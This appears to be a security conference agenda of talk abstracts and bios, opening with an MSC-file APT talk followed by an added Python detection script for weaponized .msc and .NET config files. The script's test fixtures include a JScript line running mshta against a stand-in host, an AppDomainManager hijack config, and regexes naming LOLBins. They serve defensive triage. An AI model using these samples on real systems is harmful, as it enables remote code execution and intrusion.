As the cyber threat landscape evolves, so do the tactics employed by advanced persistent threats (APTs). With the increasing disablement of macros in Microsoft Office, threat actors have adapted, turning to new methods for malware delivery over recent years. Since early 2022, there has been a noticeable shift away from traditional macro-based attacks toward techniques involving ISO files, HTML smuggling, LNK files, and CHM files. Among these methods, the use of Microsoft Common Console (MSC) files remains underexplored yet has emerged as a powerful tool for malware delivery and persistence in Windows environments. Although initially limited in use, MSC files began gaining significant traction among threat actors in early 2024. Kimsuky was one of the first groups to incorporate MSC files into its campaigns, leveraging various techniques to target victims. Recently, Kimsuky expanded its MSC-based attacks by using Zoom-themed lures, incorporating the legitimate Zoom application to add credibility and increase engagement. Following Kimsuky's example, other APT groups - including Mustang Panda, APT41, and APT Bitter - have adopted MSC files as part of their initial infection strategies. Some of these APTs combine novel methods like Grim Resource Injection and AppDomain Manager Hijacking to enhance the efficacy and stealth of their attacks. These attacks, which use legitimate Windows subsystems and tools to deliver malicious payloads, pose significant challenges for detection. Traditional enterprise security solutions often focus on identifying the aftermath of these techniques - such as the loading of malicious code into legitimate Windows processes - rather than the techniques themselves. Current EDR tools generally provide limited visibility into the full attack chain and tend to rely on known malicious payload signatures or newer detection methods, such as stack-based similarity hashing, to detect frameworks like Sliver, Cobalt Strike, and Metasploit. This technical deep dive will explore how APT groups are exploiting the hidden capabilities of MSC files to conduct stealthy, sophisticated attacks. We'll provide a timeline of MSC file adoption by various threat actors and examine the structure of weaponized MSC files, focusing on advanced techniques like Grim Resource Injection and AppDomain Manager Hijacking, which enable malicious code execution in .NET environments. Recent campaigns demonstrate how APTs are increasingly using these novel techniques to expand their toolsets and evade modern security controls. We'll also discuss detection challenges, showcase a demo of these methods in action, and highlight their implications for current detection mechanisms.
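The abstract notes that EDR tends to catch the payload rather than the delivery technique. As an added example for this agenda (not the presenters' tooling), the block below triages the two artefacts the talk names before anything runs: an .msc console file, which is XML with an MMC_ConsoleFile root whose string tables are the natural place to look for res:// redirects, script URIs and inline JScript/VBScript, and a .NET application config, where an `appDomainManagerAssembly`/`appDomainManagerType` pair under `<runtime>` is what AppDomain Manager hijacking relies on. The sample files are constructed and simplified; the `res://apds.dll` indicator follows Elastic Security Labs' public GrimResource write-up, and the config elements and APPDOMAIN_MANAGER_* environment variables are documented .NET runtime settings.

```python
"""Static triage of .msc console files and .NET application configs.

Added example, not the presenters' code. Samples are constructed and reduced to
the elements the scanner relies on: an MMC_ConsoleFile root with String tables,
and <runtime> children in a .exe.config.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

# Indicator name -> pattern applied to every text node and attribute value.
INDICATORS = [
    ("res-protocol-or-apds", re.compile(r"res://|apds\.dll", re.I)),
    ("script-uri", re.compile(r"\b(?:javascript|vbscript):", re.I)),
    ("inline-script", re.compile(r"<script\b|transformNode|ActiveXObject|WScript\.Shell", re.I)),
    ("lolbin-command", re.compile(
        r"\b(?:cmd|powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript|msiexec|certutil)(?:\.exe)?\b", re.I)),
]

# Environment variables that redirect the CLR to an attacker-supplied AppDomainManager
# (COMPLUS_Version forces the runtime version the manager assembly was built for).
HIJACK_ENV = ("APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE", "COMPLUS_VERSION")


def _values(root):
    """Yield (location, value) for every text node and attribute in the document."""
    for element in root.iter():
        if element.text and element.text.strip():
            yield element.tag, element.text.strip()
        for name, value in element.attrib.items():
            yield f"{element.tag}@{name}", value


def scan_msc(xml_text: str) -> List[Tuple[str, str]]:
    """Return (indicator, location) pairs; an empty list means nothing suspicious."""
    root = ET.fromstring(xml_text.strip())
    if root.tag != "MMC_ConsoleFile":
        return [("not-a-console-file", root.tag)]
    hits = []
    for where, value in _values(root):
        for name, pattern in INDICATORS:
            if pattern.search(value):
                hits.append((name, where))
    return hits


def scan_dotnet_config(xml_text: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the AppDomainManager assembly/type a config would load, or None."""
    root = ET.fromstring(xml_text.strip())
    runtime = root.find("runtime")
    if runtime is None:
        return None
    assembly = runtime.find("appDomainManagerAssembly")
    manager_type = runtime.find("appDomainManagerType")
    if assembly is None and manager_type is None:
        return None
    return {"assembly": assembly.get("value") if assembly is not None else None,
            "type": manager_type.get("value") if manager_type is not None else None}


def hijack_env_vars(env: Dict[str, str]) -> List[str]:
    """Same check for a process environment (e.g. from a captured process tree)."""
    return sorted(name for name in env if name.upper() in HIJACK_ENV)


# Constructed samples. The XML declaration is omitted so the strings parse as-is.
BENIGN_MSC = """<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Event Viewer</String>
    <String ID="2" Refs="1">Computer Management (Local)</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

SUSPICIOUS_MSC = """<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="Author">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Security Update</String>
    <String ID="2" Refs="1">res://apds.dll/redirect.html?target=javascript:alert(1)</String>
    <String ID="3" Refs="1">&lt;script language="JScript"&gt;new ActiveXObject("WScript.Shell").Run("mshta.exe https://example.invalid/p")&lt;/script&gt;</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

BENIGN_CONFIG = """<configuration>
  <startup><supportedRuntime version="v4.0" /></startup>
</configuration>"""

HIJACK_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="Payload, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="Payload.Manager" />
  </runtime>
</configuration>"""

if __name__ == "__main__":
    print("benign msc:", scan_msc(BENIGN_MSC))
    print("suspicious msc:", scan_msc(SUSPICIOUS_MSC))
    print("config:", scan_dotnet_config(HIJACK_CONFIG))
```

Matching on the file rather than on the spawned process is the point: a console file that carries `res://`, a `javascript:` URI or an `<script>` tag in its string table has no business doing so, and a signed .NET binary sitting next to a config that names an unknown `appDomainManagerAssembly` is the hijack itself, whichever payload eventually loads.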
June 27, 2025 09:45-10:20
- PL, TLP:GREEN
Using DNS Registry and Requests for Securing Dot Pl and Beyond
Piotr Białczak (CERT.PL/NASK, PL), Paweł Pawliński (CERT.PL/NASK, PL)
Piotr Białczak is a researcher at CERT.PL. His professional interests include network traffic analysis, phishing detection, and applying machine learning to security problems.
Paweł Pawliński is a principal specialist at CERT.PL. His job experience includes data analysis, threat tracking and automation. He is always looking for better ways to collect, leverage and share CTI.
Detecting and mitigating phishing on a country scale is a big part of our operations at CERT.PL. In this talk we will share our experiences with applying machine learning to identify suspicious sites using the .pl registry data and DNS traffic observed at the resolver level. We will compare results of different approaches to proactive detection of phishing domains and benchmark our work against alternative solutions.

Deploying machine learning tools in production is often challenging, and we will share how we integrated new monitoring capabilities with a country-wide DNS firewall serving millions of users. Our lessons learned can be useful for operators of DNS infrastructure and anyone interested in translating large volumes of data into indicators.
June 26, 2025 14:15-14:50
- US, TLP:CLEAR
Versus Killnet
Alex Holden (Hold Security LLC, US)
Alex Holden is the founder and CISO of Hold Security, LLC. Under his leadership, Hold Security has played a pivotal role in information security and threat intelligence, becoming one of the most recognizable names in its field. Mr. Holden researches the minds and techniques of cyber criminals and helps our society build better defenses against cyber-attacks.
The infamous Russian hacktivist group Killnet is more than meets the eye; it's a cyber army directed by a few to cause harm. With a checkered history and inconsistent behaviors, deciphering who is behind this group is challenging. Nevertheless, we will lift this veil and share a personal story of disrupting the group, unbalancing Killnet into chaos.
June 26, 2025 10:45-11:20
- US, TLP:CLEAR
We All Want Validation (in our SecOps Detections)
John Stoner (Google Cloud, US)
John Stoner is a Global Principal Security Strategist at Google Cloud and leverages his experience to improve users' capabilities in Security Operations, Threat Hunting, Incident Response, Detection Engineering and Threat Intelligence. He blogs on threat hunting and security operations and has built multiple APT threat emulations for blue team capture the flag events. John has presented and led workshops at various industry symposia including FIRST (CTI, Tech Colloquium), BSides (SF, Las Vegas), SANS Summits (DFIR, Threat Hunting, Cloud and SIEM), WiCyS, Way West Hacking Fest, AISA and DefCon Packet Hacking Village. He also enjoys listening to what his former teammates referred to as "80s sad-timey music."
Adversary emulation and simulation aren't just for threat hunting. These capabilities can be extended to detection engineering to give security operations teams the ability to craft detection logic that moves from indicators of compromise to adversary tactics and techniques.

But how do we ensure detections are still valid next year, or even next month? After all, environments aren't static. To make this more challenging, many organizations have test environments that don't reflect their production environments, so testing may need to take place in production.

To make meaningful progress in the field of detection engineering, testing and validation need to occur continually as security controls, infrastructure and adversaries evolve. This presentation will highlight the challenges security operations teams face and ideas on how these obstacles can be overcome.

To illustrate these efforts, we are leveraging the open source Atomic Red Team library of tests to build an infrastructure that generates events which facilitate the testing and validation of detections. The presentation will discuss bridging the gap from building initial rules to the practical application of continual testing and validation, and will include ideas on how this kind of testing can be performed in a production environment without disrupting the security operations team's current cadence and reporting.

Attendees will come away with:
- A greater understanding of why testing detections on an on-going basis is crucial
- Potential pitfalls when setting up an on-going testing process
- Solutions to simplify this process that can be used in your organization
June 23, 2025 11:45-12:20
- DK, TLP:CLEAR
Wednesday Keynote
Søren Maigaard (SektorCERT, DK)
Søren Maigaard is Director of SectorCERT, the cybersecurity centre for critical sectors. SectorCERT (formerly EnergiCERT) is an essential part of the sectors' defence against cyber threats. We help detect and manage when critical infrastructure is exposed to cyberattacks, and it is with us that the crucial knowledge that can prevent the next attack is built and shared.

Søren is chairman of the board of the Association of Danish Security Managers and has previously worked as CISO in major Danish companies within critical infrastructure.
June 25, 2025 09:00-10:00
- JE, TLP:CLEAR
What Can Cybersecurity Incident Responders Learn from Real-World Crises?
Matt Palmer (Jersey Cyber Security Centre, JE)
As Director of Jersey Cyber Security Centre (JCSC), Matt leads national cyber defence for the island of Jersey, overseeing the direction of the CSIRT in order to promote and improve cyber resilience across critical national infrastructure, businesses, communities, and citizens. A former Chief Information Security Officer for Fortune 500 companies and some of the world's leading financial institutions, Matt became the first Director of JCSC in 2021. He is a FIRST liaison member. Matt is also the co-founder of the Channel Islands Information Security Forum and a Commissioner of Jersey's financial regulator, the JFSC.
From bombings to floods and fires, real-world emergencies often demand rapid, effective responses under pressure. These scenarios present lessons that can significantly benefit the cybersecurity incident response community. Matt Palmer will explore how a series of life-and-death crises inspired the Jersey Cyber Security Centre (JCSC) to align its approach with emergency management principles and practices from civil defence and emergency services. By examining parallels between physical and cyber incidents, he will share actionable steps that security teams can take to adopt these best practices, build collaboration, and improve outcomes.
June 23, 2025 11:00-11:35
- AU, TLP:CLEAR
What Can Threat Intel Teams Learn from Journalists?
Chris Horsley (Cosive, AU)
Chris Horsley is the CTO and one of the co-founders of Cosive, a cybersecurity and CTI specialist consultancy based in Australia and New Zealand with a particular focus on security operations, IR, CTI practices, and tooling. He also enjoys experimenting with LLMs and CTI data formats like STIX and MISP and how to visualise and represent CTI concepts better.
He also has a long background in the international CSIRT community, which spanned roles including open source intelligence gathering, vulnerability disclosure handling, software and tooling development, malware analysis, and joint initiatives for national CSIRTs. Chris has previously worked as a security analyst for AusCERT, the national CSIRT at that time, and JPCERT/CC, the Japanese national CSIRT.
Cyber threat intelligence (CTI) attracts a lot of fancy frameworks and terminology, often coming from military intelligence. In spite of this, we often see CTI packages in feeds and sharing communities listing a few IP addresses with very little context about their exact nature. If we find one of these IPs in our environment, so what? Will the CTI report tell us what we're dealing with?

Let's get back to fundamentals and remove all the specialist language: what makes a CTI report actually useful? What does it need to do, and who are we writing it for?

There's something we all learned in primary school English classes that can help us write better CTI reports: how to write a newspaper article. If we get into the headspace of a reporter verifying their sources, thinking about their audience, and including the who, what, when, where, why, and how, translated into cyber threats, we can produce CTI packages of a higher standard than a lot of what we see shared today.

In this presentation, we'll use this approach from first principles for making better CTI packages using MISP and STIX, as well as something better for the humans in our constituency.
June 25, 2025 14:45-15:20
- US, DE, TLP:CLEAR
What's New in CSAF v2.1: Key Updates Explained
Justin Murphy (DHS/CISA, US), Thomas Schmidt (BSI, DE)
Justin Murphy is a Vulnerability Analyst with the Cybersecurity and Infrastructure Security Agency (CISA). As part of CISA's Coordinated Vulnerability Disclosure (CVD) Team, he helps to coordinate the remediation, mitigation, and public disclosure of newly identified cybersecurity vulnerabilities in products and services with the affected vendor(s), ranging from industrial control systems (ICS), medical devices, and Internet of Things (IoT) to traditional information technology (IT) vulnerabilities. Justin also focuses on international collaboration regarding vulnerability management, serving as co-chair for the Global Community of Practice on CVD (CVD-COP) as well as the OASIS Open technical committees for the Common Security Advisory Framework (CSAF) and OpenEoX standards.
Thomas Schmidt works in the 'Industrial Automation and Control Systems' section of the German Federal Office for Information Security (BSI). His focus is the automation of advisories on both sides: vendors/CERTs and asset owners. Schmidt has been a leader in the OASIS Open CSAF technical committee, and key in bridging this work with the CISA SBOM work. Prior to this, Schmidt was BSI's lead analyst for TRITON/TRISIS/HatMan and developed, together with partners, a rule set for Recognizing Anomalies in Protocols of Safety Networks: Schneider Electric's TriStation (RAPSN SETS). To increase the security of ICS and the broader ecosystem, BSI responsibilities cover many areas, including establishing trust and good relations with vendors and asset owners. Mr. Schmidt completed his master's in IT-Security at Ruhr-University Bochum (Germany), which included a period of research at the SCADA Security Laboratory of Queensland University of Technology (Brisbane, Australia).
The Common Security Advisory Framework (CSAF), an international, open standard for producing, distributing, and discovering machine-readable security advisories, has been making strides in enhancing transparency and efficiency for vulnerability management processes.

This talk will explore the key changes introduced in CSAF v2.1 compared to CSAF v2.0, highlighting the enhanced capabilities and flexibility of the new version. Through concrete examples, the presentation will demonstrate what can now be achieved with CSAF v2.1 that was either not possible or more challenging with CSAF v2.0. Specific focus will be given to new features, support for other updated standards like CVSS and TLP, shifting of perspectives (score to metrics, cwe to cwes, etc.), and incorporating support for the Exploit Prediction Scoring System (EPSS) and Stakeholder Specific Vulnerability Categorization (SSVC) frameworks. The session will also address migration strategies, tooling needs and updates, easy conversion, and offer practical scenarios for moving CSAF v2.0 content to v2.1, ensuring organizations can smoothly adopt the updated standard while maximizing its benefits. As the number of identified vulnerabilities rapidly increases, possibly at an exponential rate, this talk is essential for those looking to stay ahead in vulnerability management and make the most of CSAF v2.1's new features.
June 26, 2025 14:15-14:50
- US, TLP:GREEN
Where Did I Put My Keys? Preventing Data Leaks at Scale with Automation
Braxton Plaxco (Red Hat, US)
Braxton Plaxco is a Principal Security Software Engineer on Red Hat's Information Security Incident Response team and has been a member of FIRST's Automation SIG. He leads Red Hat's InfoSec Developer Team which is formed from members across the organization to build custom tooling and automation to help the Information Security team scale, reduce human error, and focus on its core objectives.
This case study delves into the lessons learned from Red Hat's efforts to detect, mitigate, and prevent data leaks not only on GitHub but also across a myriad of highly distributed sources. It all began with an internal monitoring solution, which subsequently evolved into a comprehensive architecture designed to tackle leaks at scale. The project has proven instrumental in saving considerable time and effort for our Incident Response analysts, significantly compressing the timeframe from data exposure to its successful mitigation. Furthermore, it has given rise to new tools aimed at preventing the initial exposure of sensitive data. Presently, our capability to detect leaks has reached a level where we often outpace the bad guys and preemptively avert potentially expensive incidents altogether. We invite you to join us for an overview of the architecture and a preview of our upcoming open-source release to learn how you can do it too!
June 23, 2025 14:45-15:20
- IT, TLP:AMBER
Why Be the King When You Can Be the Rogue Prince? Insights from Scraping of I2P and Freenet
Lorenzo Nicolodi (Microlab.red, IT)
Lorenzo embarked on his career as a forensic examiner before being captivated by the thrill of offensive security, with a penchant for ICS/embedded systems. Throughout the years, he has actively engaged in multiple Incident Response (IR) initiatives, progressively deepening his expertise in cyber security Research and Development (R&D). Since August 2022, Lorenzo has been immersed day and night in the pursuit of ransomware data. Recently, he has expanded his focus to include research on anonymous networks.
The 2024 Interpol Internet Organized Crime Threat Assessment report says this about I2P: "The Tor network remains the most popular way for cybercriminals to access the dark web, despite efforts to promote the Invisible Internet Project (commonly known as I2P) as a more law enforcement-resistant solution." If Tor is still the top choice, does that mean I2P is being avoided? And what about Freenet/Hyphanet?

I decided to find out for myself.

Join me as I share how the "Let's-Do-This-At-Scale"® approach (inspired by the CIRCL team <3) led me down the rabbit hole of scraping content from these networks. I'll walk you through what it takes, the obstacles and the surprises I found, and whether spending months diving into these systems was worth it, or just an exercise in digital masochism.
June 24, 2025 10:45-11:20
- FI, TLP:CLEAR
Why is Finnish Healthcare Doing So Well Against Ransomware?
Perttu Halonen (National Cyber Security Centre Finland, FI)
Perttu Halonen is a senior specialist at the National Cyber Security Centre Finland (NCSC-FI). Perttu has worked as healthcare cyber security liaison at the NCSC-FI since 2017, and facilitates the operation of the Finnish social services and healthcare information sharing and analysis centre, SOTE-ISAC.
Healthcare cyber security is a major topic, especially because of the proliferation of ransomware and cyber criminals deliberately targeting such attacks against healthcare delivery organisations. Meanwhile, Finnish healthcare providers are doing surprisingly well in terms of ransomware incidents: none reported since the year 2017. It is not clear why this is so. Ransomware incidents have become commonplace in Finnish society, and the good situation in healthcare stands out even inside Finland. In this presentation we study what kind of cyber security challenges Finnish healthcare providers face, how cyber security is managed in the Finnish healthcare system, and how the Finnish way compares to approaches in some other European countries. The presentation provides useful insights for policymakers, national level CSIRTs and cyber security managers.
June 25, 2025 11:15-11:50